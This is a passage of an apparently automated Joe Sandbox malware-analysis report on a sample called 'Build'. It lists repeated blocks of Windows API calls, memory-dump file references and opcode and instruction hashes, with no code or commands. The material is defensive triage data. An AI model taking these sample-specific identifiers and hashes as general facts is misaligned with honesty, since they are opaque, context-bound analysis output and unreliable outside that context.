                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                • Opcode ID: 2e7c7a637dd7a9078a42a9bff2238d14d302d08d013be92ab6c0e725e2eca704
                                                                                                                                                                                • Instruction ID: fcc9cde807fd4b861d4f3b73dae8c5f2cc1fbbc048e180df20c502ea1a18d391
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e7c7a637dd7a9078a42a9bff2238d14d302d08d013be92ab6c0e725e2eca704
                                                                                                                                                                                • Instruction Fuzzy Hash: 04E06D3520162256DB3137659C41F5B3AE8DF517A0F1901A2AC05E62A2CF6DDEC186E5
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,00B4AF75,CEEE5757,00000000,00B7517A,000000FF,?,00B48882,?,?), ref: 00B4AFEB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                • Opcode ID: 6b24954f09cd1fd19113812dfbdae13006c97a04516ec3f85deaf4f1b3cccac2
                                                                                                                                                                                • Instruction ID: 84035c74c077c656af326dd8128fad9a57073dcb1039b14824d759964da35196
                                                                                                                                                                                • Opcode Fuzzy Hash: 6b24954f09cd1fd19113812dfbdae13006c97a04516ec3f85deaf4f1b3cccac2
                                                                                                                                                                                • Instruction Fuzzy Hash: 2EF0BE710C2B028EDB349A20C458B92B3E4EB12326F041B9ED0E3839E0D761AA8DE641
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B4C4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?,00000000), ref: 00B4C4E6
                                                                                                                                                                                  • Part of subcall function 00B4C4A8: FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?), ref: 00B4C516
                                                                                                                                                                                  • Part of subcall function 00B4C4A8: GetLastError.KERNEL32(?,?,00000800,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?,00000000,0000003A), ref: 00B4C522
                                                                                                                                                                                • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,00B487BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 00B4C3A5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1464966427-0
                                                                                                                                                                                • Opcode ID: b01b91b9dad9c5fa895e3dcf1b7313891b080bd44f721d0c2aa34fb1272d807b
                                                                                                                                                                                • Instruction ID: 6318436c96607dbc9dd3e2d7fadd293692e9841807677fa12f3811f6639cb9ca
                                                                                                                                                                                • Opcode Fuzzy Hash: b01b91b9dad9c5fa895e3dcf1b7313891b080bd44f721d0c2aa34fb1272d807b
                                                                                                                                                                                • Instruction Fuzzy Hash: D2F08235409790AACA621BB45905BC67FD09F26332F00CAC9F1FE12192C6B56198AB32
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 176396367-0
                                                                                                                                                                                • Opcode ID: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
                                                                                                                                                                                • Instruction ID: 193e5b66f461fe0eef964d70ed143b7f5da530a92533899e4a7b69c13d407345
                                                                                                                                                                                • Opcode Fuzzy Hash: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
                                                                                                                                                                                • Instruction Fuzzy Hash: CFE04F321001806AD321AB1DD804FBFABE9DF81721F15889EF99487281CBB5AC85CA60
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetThreadExecutionState.KERNEL32(00000001), ref: 00B52F19
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExecutionStateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2211380416-0
                                                                                                                                                                                • Opcode ID: 2545071611c1ded5a0562f17c7492e8db7a2d3b6e7a92ab982f365f7b8618e16
                                                                                                                                                                                • Instruction ID: 124f31e8bb8d213b9c92d1b2ec2eef87f9015bda4d1fe2ff1f254e4ba872482b
                                                                                                                                                                                • Opcode Fuzzy Hash: 2545071611c1ded5a0562f17c7492e8db7a2d3b6e7a92ab982f365f7b8618e16
                                                                                                                                                                                • Instruction Fuzzy Hash: ABD02B1164931015DA27332578157FD16C6DFC7353F0800E2F8496B2D38F4A0C4AE3E2
                                                                                                                                                                                APIs
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000010), ref: 00B5C5BC
                                                                                                                                                                                  • Part of subcall function 00B5C34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B5C36E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1915507550-0
                                                                                                                                                                                • Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                                                                                                                                                                • Instruction ID: f940161b93eadaa9915dead951d84997e2526537c6bf030d3dade497b4cd1203
                                                                                                                                                                                • Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 53D05E30200308AAEF016A649802A6E79D6DB10341F0084E1BC0285140EDB5DA146991
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00B601A4
                                                                                                                                                                                  • Part of subcall function 00B5D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5D875
                                                                                                                                                                                  • Part of subcall function 00B5D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5D886
                                                                                                                                                                                  • Part of subcall function 00B5D864: IsDialogMessageW.USER32(0002043C,?), ref: 00B5D89A
                                                                                                                                                                                  • Part of subcall function 00B5D864: TranslateMessage.USER32(?), ref: 00B5D8A8
                                                                                                                                                                                  • Part of subcall function 00B5D864: DispatchMessageW.USER32(?), ref: 00B5D8B2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 897784432-0
                                                                                                                                                                                • Opcode ID: b014bb1f49935a3a6474c164bb8a85c171fbf3456e3f08cb0db4a01c31308bf2
                                                                                                                                                                                • Instruction ID: bf4215a20103f31df34b10695f4538b5e26d3044a80c0af80ff7fba17e0d132a
                                                                                                                                                                                • Opcode Fuzzy Hash: b014bb1f49935a3a6474c164bb8a85c171fbf3456e3f08cb0db4a01c31308bf2
                                                                                                                                                                                • Instruction Fuzzy Hash: 88D09E75148300AAD6112B51DD06F1A7AE2BB99B05F004594B685350F18A629D25EB16
                                                                                                                                                                                APIs
                                                                                                                                                                                • DloadProtectSection.DELAYIMP ref: 00B60AC0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DloadProtectSection
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2203082970-0
                                                                                                                                                                                • Opcode ID: 7f2d345423f6477e8f0b47a6096ed4de91ed143c3546e58cd39ea5b254f31d15
                                                                                                                                                                                • Instruction ID: c81685e4719ecb0e6b8ac030c98dacac1de8e01d333f922009ff3edb6c07f31a
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f2d345423f6477e8f0b47a6096ed4de91ed143c3546e58cd39ea5b254f31d15
                                                                                                                                                                                • Instruction Fuzzy Hash: 09D0123056171CADC221FBA6DCCFB2A36D0F309748F9805E0B589970B4EFBC55D08605
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                • Opcode ID: 6b8b830e851f18c51aaee745870583f9443febc0fe5c83353ec88b0637866ef1
                                                                                                                                                                                • Instruction ID: 80059ec640e9af619dc16f1ca84574e08a844ab889f6c8f9e4504e4ce6b3ed97
                                                                                                                                                                                • Opcode Fuzzy Hash: 6b8b830e851f18c51aaee745870583f9443febc0fe5c83353ec88b0637866ef1
                                                                                                                                                                                • Instruction Fuzzy Hash: F9D0EA71414A22CFD7A59F39E848782BBE5FF08311B258CAED4DAD2664EA759880CF50
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileType.KERNELBASE(000000FF,00B4B18A,?,?,?,00000000,00B4B662,?,?,00000000,?,?), ref: 00B4B294
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3081899298-0
                                                                                                                                                                                • Opcode ID: 8c9df3ad209b00ea80e2a1dcec02b66912464d1adbc84ea5e2ee5b23d1782bc9
                                                                                                                                                                                • Instruction ID: 2a2a245c0a4b7d820934be2bf21f4379746295f47aa1b526c8301b002b24d243
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c9df3ad209b00ea80e2a1dcec02b66912464d1adbc84ea5e2ee5b23d1782bc9
                                                                                                                                                                                • Instruction Fuzzy Hash: 7CC08C34000508968E704B38DC8989C7BA2EE533B77B487D8C23CCA4A2C363CD93FA00
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: fe0a82e8f26d369638eec3555f8b5e45d12f368737e154ce8f2b33fc2cf5f741
                                                                                                                                                                                • Instruction ID: c229240259ad332f509ca78723930e1a22b7eeb98f907337c56814ae1b842e09
                                                                                                                                                                                • Opcode Fuzzy Hash: fe0a82e8f26d369638eec3555f8b5e45d12f368737e154ce8f2b33fc2cf5f741
                                                                                                                                                                                • Instruction Fuzzy Hash: 67B0128A3BC203AC3648F14A9C42C3F02DCC2C1B10330C6FAF40CC0140D8441C404031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 6657ba946cedfe41eab66cdad588cdab0961837d75c7be27d8bb44785cb64f8e
                                                                                                                                                                                • Instruction ID: 19962ee9e52b7ddef079d8c3b51ba5e83cce0f92329bc012b08652ea73776f13
                                                                                                                                                                                • Opcode Fuzzy Hash: 6657ba946cedfe41eab66cdad588cdab0961837d75c7be27d8bb44785cb64f8e
                                                                                                                                                                                • Instruction Fuzzy Hash: 2CB012863BC103AC3108B14ADC02C3F02ECD2C1B10330C6FBF40CC0040D8441C000435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 72f5361cb261ba6eb42732657b0826da708be3abd97798ab4050877db2eb52a4
                                                                                                                                                                                • Instruction ID: 5bb5b9ad28501a0c46de7ea9a987cbf8af9fb06acc7c281c6f1b75182339094c
                                                                                                                                                                                • Opcode Fuzzy Hash: 72f5361cb261ba6eb42732657b0826da708be3abd97798ab4050877db2eb52a4
                                                                                                                                                                                • Instruction Fuzzy Hash: DCB0128B3BC103AC3108F14A9C42C3F02DCC2C2B10330C5FAF80CC0140D8442C010031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
